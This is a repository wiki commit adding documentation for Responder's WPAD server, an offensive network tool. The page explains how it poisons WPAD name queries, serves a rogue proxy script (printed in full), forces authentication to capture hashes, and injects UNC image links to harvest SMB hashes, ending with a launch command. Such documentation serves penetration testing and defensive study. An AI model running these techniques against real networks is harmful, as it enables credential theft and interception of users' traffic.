github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-21 22:03:30 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Created WPAD (markdown)

lgandx 2021-04-20 14:40:41 -03:00
commit 9f37abc953
1 changed files with 42 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

42
WPAD.md Normal file

@ -0,0 +1,42 @@
# Responder WPAD Server
WPAD stands for Web Proxy Auto-Discovery or Proxy Auto-Configuration (PAC).
This protocol was implemented on Internet Explorer 5.0, and the concept is to auto-configure local proxy servers on the user browser.
There is several way to configure a WPAD:
* Manually insert a WPAD server in IE -> Options -> Connection Settings -> Lan Settings.
* DHCP options 252.
* Multicast/Broadcast WPAD lookup.
Responder takes advantage of that and effectively poison WPAD broadcast/multicast queries and redirect the victim browser to its WPAD server.
Here there is two scenario:
* Force authentication when serving the WPAD file (Responder switch -F) and grab hash.
* Once the authentication has been grabbed, all browser request will be proxy-ed by Responder.
* Just serve the file, then proxy all browser requests.
Responder WPAD script is specified in Responder.conf and should be changed for your needs (at least the hardcoded name "ProxySrv"):
> WPADScript =
function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
This function contains the following directives:
* Use a proxy server for all connections.
* Responder proxy server is set to ProxySrv:3141 and ProxySrv:3128
* For any *.ProxySrv requests or if the request is for localhost/127.0.0.1, don't use the proxy.
* If this proxy server fails for whatever reason, then access the website directly.
Once the requests goes through Responder proxy, a UNC inside a <img> tag is inserted on all requests to grab SMB hashes.
This payload can be changed in Responder.conf with the setting "HTMLToInject =".
Responder WPAD proxy server gets activated by providing the "-w" command line switch.
Forcing WPAD file authentication is with the "-F" command line switch.
Example:
./Responder.py -I eth0 -rFwv